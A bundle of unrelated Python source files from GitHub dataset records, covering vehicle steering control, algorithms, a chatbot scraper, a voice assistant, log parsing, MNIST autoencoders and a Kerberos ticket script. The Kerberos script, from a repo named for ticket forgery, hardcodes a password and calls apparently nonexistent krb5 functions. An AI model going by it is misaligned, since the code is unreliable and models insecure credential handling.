* dy) / ((dx ** 2 + dy ** 2)**(3 / 2))\n return k\n\n def calc_yaw(self, s):\n\n dx = self.sx.calcd(s)\n dy = self.sy.calcd(s)\n yaw = math.atan2(dy, dx)\n return yaw\n\n\ndef calc_spline_course(x, y, ds=0.1):\n sp = Spline2D(x, y)\n s = list(np.arange(0, sp.s[-1], ds))\n\n rx, ry, ryaw, rk = [], [], [], []\n for i_s in s:\n ix, iy = sp.calc_position(i_s)\n rx.append(ix)\n ry.append(iy)\n ryaw.append(sp.calc_yaw(i_s))\n rk.append(sp.calc_curvature(i_s))\n\n return rx, ry, ryaw, rk, s\n\n\n############################################# param check!!\nk = 0.5 # control gain\nKp = 1.0 # speed proportional gain\ndt = 0.1 # [s] time difference\nL = 2.9 # [m] Wheel base of vehicle\nmax_steer = np.radians(30.0) # [rad] max steering angle\n\nshow_animation = True\n#############################################\n\nclass State(object):\n \"\"\"\n Class representing the state of a vehicle.\n :param x: (float) x-coordinate\n :param y: (float) y-coordinate\n :param yaw: (float) yaw angle\n :param v: (float) speed\n \"\"\"\n\n def __init__(self, x=0.0, y=0.0, yaw=0.0, v=0.0):\n \"\"\"Instantiate the object.\"\"\"\n super(State, self).__init__()\n self.x = x\n self.y = y\n self.yaw = yaw\n self.v = v\n\n def update(self, acceleration, delta):\n \"\"\"\n Update the state of the vehicle.\n Stanley Control uses bicycle model.\n :param acceleration: (float) Acceleration\n :param delta: (float) Steering\n \"\"\"\n delta = np.clip(delta, -max_steer, max_steer)\n\n self.x += self.v * np.cos(self.yaw) * dt\n self.y += self.v * np.sin(self.yaw) * dt\n self.yaw += self.v / L * np.tan(delta) * dt\n self.yaw = normalize_angle(self.yaw)\n self.v += acceleration * dt\n\n\ndef pid_control(target, current):\n \"\"\"\n Proportional control for the speed.\n :param target: (float)\n :param current: (float)\n :return: (float)\n \"\"\"\n return Kp * (target - current)\n\n\ndef stanley_control(state, cx, cy, cyaw, last_target_idx):\n \"\"\"\n Stanley steering control.\n :param state: (State object)\n :param cx: ([float])\n :param cy: ([float])\n :param cyaw: ([float])\n :param last_target_idx: (int)\n :return: (float, int)\n \"\"\"\n current_target_idx, error_front_axle = calc_target_index(state, cx, cy)\n\n if last_target_idx >= current_target_idx:\n current_target_idx = last_target_idx\n\n # theta_e corrects the heading error\n theta_e = normalize_angle(cyaw[current_target_idx] - state.yaw)\n # theta_d corrects the cross track error\n theta_d = np.arctan2(k * error_front_axle, state.v)\n # Steering control\n delta = theta_e + theta_d\n\n return delta, current_target_idx\n\n\ndef normalize_angle(angle):\n \"\"\"\n Normalize an angle to [-pi, pi].\n :param angle: (float)\n :return: (float) Angle in radian in [-pi, pi]\n \"\"\"\n while angle > np.pi:\n angle -= 2.0 * np.pi\n\n while angle < -np.pi:\n angle += 2.0 * np.pi\n\n return angle\n\n\ndef calc_target_index(state, cx, cy):\n \"\"\"\n Compute index in the trajectory list of the target.\n :param state: (State object)\n :param cx: [float]\n :param cy: [float]\n :return: (int, float)\n \"\"\"\n # Calc front axle position\n fx = state.x + L * np.cos(state.yaw)\n fy = state.y + L * np.sin(state.yaw)\n\n # Search nearest point index\n dx = [fx - icx for icx in cx]\n dy = [fy - icy for icy in cy]\n d = np.hypot(dx, dy)\n target_idx = np.argmin(d)\n\n # Project RMS error onto front axle vector\n front_axle_vec = [-np.cos(state.yaw + np.pi / 2),\n -np.sin(state.yaw + np.pi / 2)]\n error_front_axle = np.dot([dx[target_idx], dy[target_idx]], front_axle_vec)\n\n return target_idx, error_front_axle\n\n\ndef local_path_callback(data):\n global local_path\n\n for i in range(len(data.poses)):\n local_path[i][0] = data.poses[i].pose.position.x\n local_path[i][1] = data.poses[i].pose.position.y\n count +=1\n\ndef speed_callback(data):\n global speed\n\n speed = data.data/36 #### why those the speed devided by 36???????\n\n\n\n\n\n # Test\n #assert last_idx >= target_idx, \"Cannot reach goal\"\n##### ros function\n\n\n\nif __name__ == '__main__':\n rospy.init_node('stanley')\n listener = tf.TransformListener()\n #Subscriber\n rospy.Subscriber(\"/final_path\",Path,local_path_callback)\n rospy.Subscriber(\"/ERP42_speed\",Float32,speed_callback)\n\n #Publisher\n ackermann_pub = rospy.Publisher('/ackermann_cmd', AckermannDriveStamped, queue_size=10)\n\n ackermann=AckermannDriveStamped()\n\n ########### variable\n count = 0\n speed = 0\n ax =0\n ay =0\n ########### stanley code\n for i in range(count): \n ax = local_path[i][0] # array???\n ay = local_path[i][1] # array???\n\n cx, cy, cyaw, ck, s = calc_spline_course(\n ax, ay, ds=0.1)\n\n max_simulation_time = 100.0 ########## check if it is necessary\n\n # Initial state\n state = State(x=-0.0, y=5.0, yaw=np.radians(20.0), v=0.0)\n \n last_idx = len(cx) - 1\n time = 0.0\n x = [state.x]\n v = [state.v]\n t = [0.0]\n target_idx, _ = calc_target_index(state, cx, cy)\n\n while max_simulation_time >= time and last_idx > target_idx:\n ai = pid_control(speed, state.v) ######### target_speed -> speed\n di, target_idx = stanley_control(state, cx, cy, cyaw, target_idx)\n state.update(ai, di)\n\n time += dt\n\n x.append(state.x)\n y.append(state.y)\n yaw.append(state.yaw)\n v.append(state.v)\n t.append(time)\n\n \n ########### ackermann message\n ackermann.drive.speed = speed ### speed => erp42 speed\n ackermann.drive.steering_angle = di\n ackermann.drive.jerk = 0\n ackermann.drive.acceleration = 0\n\n\n\n \n","repo_name":"taesla/opencv_termproject","sub_path":"autonomous-vehicle-MDS/stauto_control/src/stanley2.py","file_name":"stanley2.py","file_ext":"py","file_size_in_byte":9584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72118816040","text":"def lcs3(first_sequence, second_sequence, third_sequence):\n m, n, k = len(first_sequence), len(second_sequence), len(third_sequence)\n T = [[[0] * (n + 1) for _ in range(m + 1)] for _ in range(k + 1)]\n\n for v in range(1, k + 1):\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if(first_sequence[i-1] == second_sequence[j-1] == third_sequence[v - 1]):\n T[v][i][j] = T[v-1][i-1][j-1] + 1\n else:\n T[v][i][j] = max(T[v][i-1][j], T[v][i][j-1], T[v-1][i][j], \n T[v][i-1][j-1], T[v-1][i][j-1], T[v-1][i-1][j]\n )\n\n return T[k][m][n]\n\nif __name__ == '__main__':\n n = int(input())\n a = list(map(int, input().split()))\n assert len(a) == n\n\n m = int(input())\n b = list(map(int, input().split()))\n assert len(b) == m\n\n q = int(input())\n c = list(map(int, input().split()))\n assert len(c) == q\n\n print(lcs3(a, b, c))\n","repo_name":"Bessawy/Algorithms-ToolBox","sub_path":"week5_dynamic_programming1/5_longest_common_subsequence_of_three_sequences/lcs3.py","file_name":"lcs3.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16268404903","text":"import requests, re\nimport json\nimport datetime\n\nclass A_chat(object):\n \"\"\"\n 一个具备会话管理能力的机器人\n \"\"\"\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (\"\n \"KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36\"}\n\n def __init__(self, wechat_name):\n self.wechat_name = wechat_name\n self.robotId = None\n self.userId = None\n self.sessionId = None\n self.id_info = None\n self.get_all_id()\n self.cookies = None\n self.creat_time = datetime.datetime.now()\n\n def time_difference(self):\n \"\"\"\n 判断该对象是否过期\n :return: 过期返回False\n \"\"\"\n start = self.creat_time\n end=datetime.datetime.now()\n if (end - start).seconds > 30: # 30 秒数\n return False\n else:\n return True\n\n\n @staticmethod\n def json_parsing(data):\n \"\"\"\n 将返回回来的字符串解析为json\n :param data:response\n :return:dirt\n \"\"\"\n reg = re.findall(r'[{](.*)[}]', data)[0]\n data = \"{\" + reg + \"}\"\n return json.loads(data)\n\n @staticmethod\n def punctuate(data):\n \"\"\"切分语句\"\"\"\n result = data.split(\"__webrobot_processMsg\")\n return result[-1]\n\n def get_all_id(self):\n \"\"\"获取 三个ID\"\"\"\n url = \"http://i.xiaoi.com/robot/webrobot?&callback=__webrobot__processOpenResponse&\" \\\n \"data=%7B%22type%22%3A%22open%22%7D&ts=1576170536940\"\n response = requests.get(url, headers=self.headers).text\n try:\n datadir = self.json_parsing(response)\n self.id_info = datadir\n except Exception as e:\n print(e)\n # 赋值\n self.robotId = datadir[\"robotId\"]\n self.userId = datadir[\"userId\"]\n self.sessionId = datadir[\"sessionId\"]\n\n def get_chat(self, data):\n \"\"\"\n 获取回答\n :param data:\n :return:\n \"\"\"\n url_0 = \"http://i.xiaoi.com/robot/webrobot?&callback=__webrobot_processMsg&data=\"\n dir = self.id_info\n body_dir = {\"content\": data}\n dir[\"body\"] = body_dir\n dir[\"type\"] = \"txt\"\n url = url_0 + str(dir) + \"&ts=1576173243291\"\n if self.cookies ==None:\n response = requests.get(url, headers=self.headers)\n self.cookies = response.cookies.get_dict()\n data_0 = self.punctuate(response.text)\n data = self.json_parsing(data_0)\n result0 = \"Hi,我是川大旺仔机器人,我可以查天气,讲笑话,订机票哦~ 除此之外还有几十项实用好玩的功能哦~ 快来试试吧\\r\\n\"\n result1 = data[\"body\"][\"content\"]\n return result0+result1\n else:\n response = requests.get(url, headers=self.headers, cookies=self.cookies)\n data_0 = self.punctuate(response.text)\n data = self.json_parsing(data_0)\n result1 = data[\"body\"][\"content\"]\n return result1.strip()\n\nif __name__ == '__main__':\n new_chat = A_chat(\"zjianfa\")\n # print(new_chat.__dict__)\n a = new_chat.get_chat(data=\"天气\")\n b = new_chat.get_chat(data=\"成都\")\n print(a, b)\n\n\n","repo_name":"InModeration/ScuRobot","sub_path":"wechat_dir/bot_online.py","file_name":"bot_online.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16039345854","text":"from PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QDialogButtonBox\nimport datetime\n\nclass MultipleInputDialog(QtWidgets.QDialog):\n\n def __init__(self, parent=None, windowTitle=None, labelArr=None):\n super().__init__(parent)\n self.setWindowTitle(windowTitle)\n self.lineEdits = []\n self.resultList = []\n\n buttonBox = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)\n\n if labelArr is None:\n labelArr = [\"Input\"]\n\n for i in range(len(labelArr)):\n self.lineEdits.append(QtWidgets.QLineEdit(parent=self))\n\n layout = QtWidgets.QFormLayout(self)\n for ix, inp in enumerate(labelArr):\n if inp == \"Date:\":\n now = datetime.datetime.now()\n now = now.date()\n self.lineEdits[ix].setText(str(now))\n layout.addRow(inp, self.lineEdits[ix])\n\n layout.addWidget(buttonBox)\n\n buttonBox.accepted.connect(self.action_btnOk)\n buttonBox.rejected.connect(self.reject)\n\n def action_btnOk(self):\n for lineEdit in self.lineEdits:\n self.resultList.append(lineEdit.text())\n self.accept()\n\n def getResult(self):\n if len(self.resultList) == 1:\n return self.resultList[0]\n return self.resultList\n","repo_name":"hilmiguner/Debt-Calculator","sub_path":"dialogBoxes.py","file_name":"dialogBoxes.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4131450222","text":"import speech_recognition as sr\nimport webbrowser\nimport sys\nimport os\nimport winsound\n\n\n\nmicrophone = sr.Microphone()\nrecognizer = sr.Recognizer()\nrecognizer.pause_threshold = 0.3\nrecognizer.non_speaking_duration = 0.2\nrecognizer.dynamic_energy_adjustment_ratio = 0.2\n\n\ndef execute(statement):\n if \"open\" in statement:\n if \"google\" in statement:\n webbrowser.open_new('https://www.google.ru')\n elif \"youtube\" in statement:\n webbrowser.open_new_tab(\"https://www.youtube.com\")\n elif \"translator\" in statement:\n webbrowser.open_new(\"https://translate.google.ru/?hl=ru\")\n elif \"manager\" in statement:\n os.system('taskmgr')\n elif \"overwatch\" in statement:\n os.startfile(r\"C:\\Program Files (x86)\\Overwatch\\Overwatch Launcher.exe\")\n elif (\"google chrome\" in statement) or (\"Google chrome\" in statement) or (\"Google Chrome\" in statement):\n os.startfile(r\"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\")\n elif (\"firefox\" in statement) or (\"mozilla\" in statement) or (\"mozilla firefox\" in statement) or (\"firefox mozilla\" in statement):\n os.startfile(r\"C:\\Program Files\\Mozilla Firefox\\firefox.exe\")\n elif \"close\" in statement:\n if \"browser\" in statement:\n os.system(\"TASKKILL /IM chrome.exe\")\n elif \"find\" in statement:\n if \"in google\" in statement:\n webbrowser.open_new_tab(\"https://www.google.com/search?q=\" + statement[statement.find(\"find\") + 5:statement.find(\"in google\") - 1:1])\n elif (\"in youtube\" in statement) or (\"on youtube\" in statement):\n webbrowser.open_new_tab(\"https://www.youtube.com/results?search_query=\" + statement[statement.find(\"find\") + 5:statement.find(\"youtube\") - 4:1])\n elif (\"shutdown\" in statement) or (\"shut down\" in statement):\n sys.exit(\"closed\")\n\ndef listening():\n with microphone as source:\n recognizer.adjust_for_ambient_noise(source) #generate noise mask\n print(\"Starting listening...\")\n winsound.MessageBeep(-1)\n try:\n audio = recognizer.listen(source)\n statement = recognizer.recognize_google(audio)\n statement = statement.lower()\n print(\"You said: \", statement)\n execute(statement)\n except Exception:\n None","repo_name":"smlez/VoiceAssistant","sub_path":"commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73182758760","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nN = int(input())\r\nwork = []\r\n\r\nfor _ in range(N):\r\n T, S = map(int, input().split())\r\n work.append([S, T])\r\n\r\nwork.sort()\r\ncur = work[-1][0]\r\n\r\nwhile work:\r\n deadline, time = work.pop()\r\n if cur > deadline:\r\n cur = deadline\r\n cur -= time\r\n\r\nprint(cur) if cur > 0 else print(-1)\r\n","repo_name":"JSeungHyun/Algorithm","sub_path":"백준/Silver/1263. 시간 관리/시간 관리.py","file_name":"시간 관리.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13034032202","text":"import os\nimport math\nimport statistics as st\n\nstart_time = 60\nend_time = 120\n\ndef get_params(fbase, filename):\n\tdata = filename\n\tdata = data.replace(fbase + '_', '')\n\tdata = data.replace('.log', '')\n\tdata = data.replace('[', '_')\n\tdata = data.replace(']', '')\n\tdata = data.split('_')\n\treturn data\n\ndef write_to_file(name, content):\n\tfres = 'logs/' + name + '.log'\n\twrite_to_named_file(fres, content)\n\ndef write_to_named_file(fname, content):\n\twith open(fname, 'w+') as f:\n\t\tfor val in content:\n\t\t\ti = 0\n\t\t\tfor el in val:\n\t\t\t\tf.write(el)\n\t\t\t\ti += 1\n\t\t\t\tif i != len(val):\n\t\t\t\t\tf.write(',')\n\t\t\tf.write('\\n')\n\nheaders_response_time_end = ['Response time', 'Standard deviation', 'Bucket distribution (value, size)']\n\ndef parse_throughput(fbase, headers, directory='./logs'):\n\tres = []\n\tres2 = []\n\tfor filename in os.listdir(directory):\n\t\tif filename.startswith(fbase + '_'):\n\t\t\tdata = get_params(fbase, filename)\n\t\t\t(stat, general) = parse_throughput_single(os.path.join(directory, filename))\n\t\t\tres.append(data + stat)\n\t\t\tgeneral = list(map(lambda x : str(x), general))\n\t\t\tres2.append(data + general)\n\t\telse:\n\t\t\tcontinue\n\n\tres = [headers] + res\n\twrite_to_file(fbase, res)\n\n\t# res2 = list(map(lambda x : str(x), res2))\n\twrite_to_file(fbase + '-values', res2)\n\ndef parse_throughput_single(fname, type='Total'):\n\tprint(fname)\n\ttill_stability_throughput = 0\n\tres = []\n\twith open(fname, 'r') as fh:\n\t\tlines = fh.readlines()\n\t\ti = 0\n\t\tstarted = False\n\t\twhile i < len(lines):\n\t\t\tline = lines[i]\n\t\t\tif (line.find('%s Statistics' % type) != -1) and (line.find('%s Statistics (' % type) == -1):\n\t\t\t\ti += 3\n\t\t\t\tcur_throughput = int(lines[i].split()[3])\n\t\t\t\tif started:\n\t\t\t\t\tres.append(int(lines[i - 1].split()[3])) # from period\n\t\t\t\tif lines[i].split()[1] == str(start_time):\n\t\t\t\t\ttill_stability_throughput = cur_throughput\n\t\t\t\t\tstarted = True\n\t\t\t\telif lines[i].split()[1] == str(end_time):\n\t\t\t\t\tthroughput = cur_throughput\n\t\t\t\t\tbreak\n\t\t\ti += 1\n\t\tthroughput = (throughput * end_time - till_stability_throughput * start_time) / (end_time - start_time)\n\n\t\treturn ([str(throughput), str(st.pstdev(res))], res)\n\n\ndef parse_response_time_single(fname, type='Total'):\n\tprint(fname)\n\ttill_stability_average = 0\n\ttill_stability_std= 0\n\twith open(fname, 'r') as fh:\n\t\tlines = fh.readlines()\n\t\ti = 0\n\t\tstarted = False\n\t\tres = []\n\t\twhile i < len(lines):\n\t\t\tline = lines[i]\n\t\t\tif (line.find('%s Statistics' % type) != -1) and (line.find('%s Statistics (' % type) == -1):\n\t\t\t\ti += 3\n\t\t\t\tif started:\n\t\t\t\t\tres.append(float(lines[i].split()[9]))\n\t\t\t\tif lines[i].split()[1] == str(start_time):\n\t\t\t\t\ttill_stability_average = float(lines[i].split()[8])\n\t\t\t\t\ttill_stability_std = float(lines[i].split()[9])\n\t\t\t\t\tstarted = True\n\t\t\t\telif lines[i].split()[1] == str(end_time):\n\t\t\t\t\tresponse_time = float(lines[i].split()[8])\n\t\t\t\t\tresponse_time_std = float(lines[i].split()[9])\n\t\t\tif (line.find('Log2 Dist:') != -1) and (lines[i-6].find(type) != -1):\n\t\t\t\ti += 1\n\t\t\t\tline = lines[i]\n\t\t\t\tbase = int(line.split()[0][:-1])\n\t\t\t\tperc = []\n\t\t\t\twhile line.strip():\n\t\t\t\t\tline = line.split()[1:]\n\t\t\t\t\tfor k in range(0, len(line)):\n\t\t\t\t\t\tperc.append(str(2**base))\n\t\t\t\t\t\tperc.append(line[k])\n\t\t\t\t\t\tbase += 1\n\t\t\t\t\ti += 1\n\t\t\t\t\tline = lines[i]\n\n\t\t\ti += 1\n\t\tresponse_time = (response_time * end_time - till_stability_average * start_time) / (end_time - start_time)\n\t\tresponse_time_std = math.sqrt((math.pow(response_time_std, 2) * end_time\n\t\t\t\t- math.pow(till_stability_std, 2) * start_time) / (end_time - start_time))\n\n\t\treturn [str(response_time), str(response_time_std)] + perc\n\ndef parse_replication():\n\tparams_header = ['Replication factor', 'Number of servers', 'Repetition']\n\tparse_throughput('improved-replication', params_header + ['TPS', 'Standard deviation'])\n\t# parse_response_time('improved-replication', 'improved-replication-response_time',\n\t# \t\t\tparams_header + headers_response_time_end)\n\t# for type in ['Get', 'Set']:\n\t# \tparse_response_time('improved-replication', 'improved-replication-response_time-%s' % type.lower(),\n\t# \t\t\tparams_header + headers_response_time_end, type=type)\n\n\ndef parse_writes():\n\tparams_header = ['Replication factor', 'Number of servers', 'Repetition']\n\tparse_throughput('improved-writes', params_header + ['TPS', 'Standard deviation'])\n\t# parse_response_time('improved-writes', 'improved-writes-response_time',\n\t# \t\t\tparams_header + headers_response_time_end)\n\t# for type in ['Get', 'Set']:\n\t# \tparse_response_time('improved-writes', 'improved-writes-response_time-%s' % type.lower(),\n\t# \t\t\tparams_header + headers_response_time_end, type=type)\n\ndef parse_mm1(vm_number):\n\tfname = 'logs/mm1.log'\n\tdata = []\n\twith open(fname, 'r') as fh:\n\t\tlines = fh.readlines()\n\t\ti = 0\n\t\ttime = 1\n\t\twhile i < len(lines):\n\t\t\tline = lines[i]\n\t\t\tif line.find('Total Statistics') != -1:\n\t\t\t\tif line.find('Total Statistics (') == -1:\n\t\t\t\t\ti += 2\n\t\t\t\t\tline = lines[i].split()\n\t\t\t\t\tdata.append([str(time), line[3], line[8], line[9]])\n\t\t\t\t\ttime += 1\n\t\t\t\telse:\n\t\t\t\t\t# Total average response time and std\n\t\t\t\t\ti += 3\n\t\t\t\t\tresponse_time = lines[i].split()[1]\n\t\t\t\t\ti += 1\n\t\t\t\t\tresponse_time_std = lines[i].split()[1]\n\t\t\ti += 1\n\t# For whole experiment\n\tpat = 'TPS: '\n\tstart = line.find(pat) + len(pat)\n\tend = line[start:].find(' ')\n\ttps = line[start:start+end]\n\tdata.append(['Total', tps, response_time, response_time_std])\n\tdata = [['Time', 'TPS', 'Response time', 'Response time standard deviation']] + data\n\twrite_to_named_file('logs/mm1_parsed_%d.log' % vm_number, data)\n\n","repo_name":"matalek/eth-asl","sub_path":"parse/milestone_3/parse_logs_vms.py","file_name":"parse_logs_vms.py","file_ext":"py","file_size_in_byte":5438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6262150804","text":"import krb5\nimport logging\nimport sys\nimport socket\nimport os\n\nlogging.basicConfig(stream=sys.stdout, level=logging.DEBUG) # start of the krb logging\n\ntry:\n context = krb5.Context()\nexcept krb5.Krb5Error as e:\n logging.error(f\"Error setting up Kerberos context: {e}\")\n sys.exit(1)\ntry:\n creds = context.get_init_creds_password(\"thunder@thunder\", \"Thunder1\")\nexcept krb5.Krb5Error as e:\n logging.error(f\"Error requesting TGT: {e}\")\n sys.exit(1)\n\ntry:\n context.verify_creds(creds, \"thunder@thunder\", None)\nexcept krb5.Krb5Error as e:\n logging.error(f\"Error verifying TGT: {e}\")\n sys.exit(1)\n\nsession_key = creds.session_key.contents\ntry:\n service_principal = krb5.Principal(\"service@REALM\")\n service_ticket = context.get_service_ticket(creds, service_principal)\nexcept krb5.Krb5Error as e:\n logging.error(f\"Error requesting service ticket: {e}\")\n sys.exit(1)\n\ntry:\n context.verify_ticket(service_ticket, None, creds, service_principal, None, None)\nexcept krb5.Krb5Error as e:\n logging.error(f\"Error verifying service ticket: {e}\")\n sys.exit(1)\nservice_session_key = service_ticket.session_key.contents\n\nplaintext = \"Hello, world!\" # encrypting the session keys provided from the kdc\nencrypted_plaintext = krb5.crypt(plaintext, session_key, direction=krb5.EncryptDirection.ENCRYPT)\ndecrypted_plaintext = krb5.crypt(encrypted_plaintext, service_session_key, direction=krb5.EncryptDirection.DECRYPT)\n\ntry:\n client_authenticator = krb5.Authenticator(context=context, client=creds.client, subkey=None, seq_number=None, checksum=None, cksumtype=None, authenticator=None)\n service_authenticator = krb5.Authenticator(context=context, client=creds.client, subkey=None, seq_number=None, checksum=None, cksumtype=None, authenticator=None)\n client_authenticator_seqnum = context.generate_seq_number()\n client_authenticator.ctime = context.timeofday()\n client_authenticator.cusec = context.microsecond()\n client_authenticator.seq_number = client_authenticator_seqnum\n client_authenticator.authorization_data = None\n service_authenticator.ctime = context.timeofday()\n service_authenticator.cusec = context.microsecond()\n service_authenticator.seq_number = client_authenticator_seqnum\n service_authenticator.authorization_data = None\n context.verify_ap_req(service_ticket, creds, client_authenticator, service_authenticator, None)\nexcept krb5.Krb5Error as e:\n logging.error(f\"Error creating or verifying authenticator: {e}\")\n sys.exit(1)\n# checks the hostname of the local machine \n# might be maybe the domain controller.\n\ntry:\n hostname = socket.gethostname()\n logging.info(f\"Hostname: {hostname}\")\nexcept socket.error as e:\n logging.error(f\"Error getting hostname: {e}\")\n sys.exit(1)\n# well still i've some section not getting debugged\n# if it doesnt work then cry :-) anyway kidding.. \n# i am developing more \n \n","repo_name":"Ndegwadavid/Kerberos-Auth-ticket-forgery","sub_path":"KRB/krb5.py","file_name":"krb5.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"22913315434","text":"\"\"\"\nHeader\n\"\"\"\n\nimport numpy as np\nimport os\nimport pickle\nimport sys\nimport tensorflow as tf\n\nassert sys.version_info[0] == 3 # We need to read python3-style pickles for most module functionality\n\npath = os.path.abspath(__file__)\ndir_path = os.path.dirname(os.path.dirname(path))\npickle_dir = os.path.join(dir_path, 'data_pickles')\nautoencoder_dir = os.path.join(pickle_dir, 'tied_no_bias')\nfft_autoencoder_dir = os.path.join(pickle_dir, 'fft_tied_no_bias')\nplots_dir = os.path.join(dir_path, 'plots')\n\n\ndef get_mnist_data():\n\tfrom tensorflow.examples.tutorials.mnist import input_data\n\treturn input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n\ndef compress_fft(fft_data, data_set = 'mnist'):\n\t\"\"\" For now just works with MNIST data set \"\"\"\n\tassert data_set == 'mnist'\n \n\ttemp_array = fft_data[:,:,:15].reshape(-1,28 * 15)\n\treturn_array = np.zeros((len(temp_array), 2 * temp_array.shape[1]))\n\treturn_array[:,::2] = np.real(temp_array)\n\treturn_array[:,1::2] = np.imag(temp_array)\n\tmask = (np.ones_like(return_array[0]) == np.ones_like(return_array[0]))\n\tmask[30 * np.arange(15,28)] = False\n\tmask[30 * np.arange(15,28) + 1] = False\n\tmask[28 + 30 * np.arange(15,28)] = False\n\tmask[28 + 30 * np.arange(15,28) + 1] = False\n\t#\n\tmask[1] = False\n\tmask[29] = False\n\tmask[14 * 30 + 1] = False\n\tmask[14 * 30 + 29] = False\n\treturn return_array[:,mask]\n\n\ndef decompress_fft(compressed_fft_data, data_set = 'mnist'):\n\t\"\"\" For now just works with MNIST data set \"\"\"\n\tassert data_set == 'mnist'\n \n\tstep_one = np.zeros((len(compressed_fft_data), 840))\n\tstep_one[:,0] = compressed_fft_data[:,0]\n\tstep_one[:,2:29] = compressed_fft_data[:,1:28]\n\tstep_one[:,30:421] = compressed_fft_data[:,28:419]\n\tstep_one[:,422:449] = compressed_fft_data[:,419:446]\n\t#\n\tstep_one[:,[30 * np.arange(15,28)]] = step_one[:,[30 * np.arange(13,0,-1)]]\n\tstep_one[:,[30 * np.arange(15,28) + 1]] = -step_one[:,[30 * np.arange(13,0,-1) + 1]]\n\tstep_one[:,[28 + 30 * np.arange(15,28)]] = step_one[:,[28 + 30 * np.arange(13,0,-1)]]\n\tstep_one[:,[28 + 30 * np.arange(15,28) + 1]] = -step_one[:,[28 + 30 * np.arange(13,0,-1) + 1]]\n\t#\n\tstep_one_index, compressed_index = 452, 446\n\tfor i in range(13):\n\t\ta, b = step_one_index, step_one_index + 26\n\t\tc, d = compressed_index, compressed_index + 26\n\t\tstep_one[:, a:b] = compressed_fft_data[:, c:d]\n\t\tstep_one_index = b + 4\n\t\tcompressed_index = d\n\n\tstep_two = np.zeros((len(compressed_fft_data), 28, 28), dtype=np.complex128)\n\treal_ar, im_ar = (step_one.reshape(-1,28,30)[:,:,::2],\n\t\tstep_one.reshape(-1,28,30)[:,:,1::2])\n\tstep_two[:, :, :15] += real_ar + 1j * im_ar \n\tstep_two[:, 1:, 15:] = np.conjugate(step_two[:,:0:-1,13:0:-1])\n\tstep_two[:,0,15:] = np.conjugate(step_two[:,0,13:0:-1])\n\n\treturn step_two\n\t\n# Obtained \"compressed\" Fourier transformed versions of the MNIST image sets\n\ndef compressed_fft_data(mnist_images):\n\treturn compress_fft(np.fft.fft2(mnist_images.reshape(-1,28,28), axes = [1,2]))\n\n\ndef add_compressed_fft_data(mnist_data_set):\n\tmnist_data_set.fft_images = compressed_fft_data(mnist_data_set.images)\n\n\ndef add_autoencoded_mnist_data_set(mnist_data_set, dimension):\n\t\"\"\" Add data to mnist data set (train, validation, or test)\n\t\tthat has been Fast Fourier Transformed and then passed\n\t\tto an autoencoder of the specified dimension \"\"\"\n\n\tpickle_name = 'nc-' + str(dimension) + '.pickle'\n\t\n\tif pickle_name not in os.listdir(autoencoder_dir):\n\t\traise ValueError('No autoencoder for image data found for ' \n\t\t\t+ str(dimension) + ' dimensions.')\n\n\tpickle_pathname = os.path.join(autoencoder_dir, pickle_name)\n\t\n\twith open(pickle_pathname, 'rb') as pickle_file:\n\t\td = pickle.load(pickle_file)\n\t\tW = d['W']\n\n\tencoded_data = mnist_data_set.images.dot(W)\n\n\tif 'autoencoder' in dir(mnist_data_set):\n\t\tmnist_data_set.autoencoder[dimension] = encoded_data\n\telse:\n\t\tmnist_data_set.autoencoder = {dimension: encoded_data}\n\n\ndef add_fft_autoencoded_mnist_data_set(mnist_data_set, dimension):\n\t\"\"\" Add data to mnist data set (train, validation, or test)\n\t\tthat has been Fast Fourier Transformed and then passed\n\t\tto an autoencoder of the specified dimension \"\"\"\n\n\tpickle_name = 'nc-' + str(dimension) + '.pickle'\n\t\n\tif pickle_name not in os.listdir(fft_autoencoder_dir):\n\t\traise ValueError('No autoencoder for FFT data found for ' \n\t\t\t+ str(dimension) + ' dimensions.')\n\n\tpickle_pathname = os.path.join(fft_autoencoder_dir, pickle_name)\n\t\n\twith open(pickle_pathname, 'rb') as pickle_file:\n\t\td = pickle.load(pickle_file)\n\t\tW = d['W']\n\n\tif 'fft_images' in dir(mnist_data_set):\n\t\tfft_data = mnist_data_set.fft_images\n\telse:\n\t\tfft_data = compressed_fft_data(mnist_data_set.images)\n\n\tencoded_data = fft_data.dot(W)\n\n\tif 'fft_autoencoder' in dir(mnist_data_set):\n\t\tmnist_data_set.fft_autoencoder[dimension] = encoded_data\n\telse:\n\t\tmnist_data_set.fft_autoencoder = {dimension: encoded_data}\n\n\ndef add_hybrid_autoencoded_mnist_data_set(mnist_data_set, dim_tuple):\n\t\"\"\" Add data to a mnist data set (train, validation, or test)\n\tconsisting of the original data autoencoded to dim_tuple[0] dimensions\n\tand the FFT data autoencoded to dim_tuple[1] dimensions. The result\n\tis a numpy array with dim_tuple[0] + dim_tuple[1] features. \"\"\"\n\t\t\n\tif dim_tuple == (0,0):\n\t\treturn\n\n\tif dim_tuple[0] == 0:\n\t\tif ('fft_autoencoder' not in dir(mnist_data_set) or \n\t\t\tdim_tuple[1] not in 